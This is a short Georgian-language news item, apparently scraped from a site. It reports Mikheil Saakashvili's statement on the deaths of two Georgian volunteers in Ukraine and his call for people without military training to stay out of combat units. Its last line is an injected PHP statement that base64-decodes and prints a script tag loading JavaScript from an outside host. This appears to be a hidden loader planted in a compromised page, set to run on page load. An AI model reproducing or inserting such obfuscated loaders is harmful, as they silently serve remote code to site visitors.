celsiusi
ავერსი საქკაბელი
საქართველოს მესამე პრეზიდენტის მიხეილ სააკაშვილის განცხადებით, ის რომ უკრაინაში იყოს, წინა ხაზზე გავიდოდა, ვინაიდან 2 წელი ჯარშიც იმსახურა და საქართველოში რეზერვისტის კურსიც გავლილი აქვს. ამის შესახებ, მესამე პრეზიდენტის მიერ გავრცელებულ განცხადებაშია აღნიშნული, რომელიც მის „ფეისბუქ“ გვერდზე გავრცელდა.
 
სააკაშვილის აღნიშნავს, ფაქტს უკრაინაში ორი ქართველი მოხალისეს დაიღუპვაზე და მოქალაქეებს მოუწოდებს, სამხედრო მომზადების გარეშე შეიარაღებულ შენაერთში ნუ ჩაეწერებიან.
 
„ძალიან სამწუხარო ფაქტი - ორი ქართველი მოხალისე დაგვეღუპა. მინდა ყველას მოვუწოდო, ვინც უკრაინაში მიდის - თუ საერთოდ არ გაქვთ რაიმე სამხედრო მომზადება გავლილი, ნუ ჩაეწერებით შეიარაღებულ შენაერთში. ადგილზე ბევრი სხვა სახის დახმარებაა შესაძლებელი. დაეხმარეთ საგანგებო სიტუაციების სამსახურს, სამედიცინო ბრიგადებს. წინა ხაზზე გასვლა სულ სხვა მომზადებას საჭიროებს. მე რომ იქ ვიყო, წინა ხაზზე გავიდოდი, ვინაიდან 2 წელი ჯარშიც ვიმსახურე და საქართველოში რეზერვისტის კურსიც გავლილი მაქვს“,- განმარტავს მიხეილ სააკაშვილი.
 
 
 
967
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");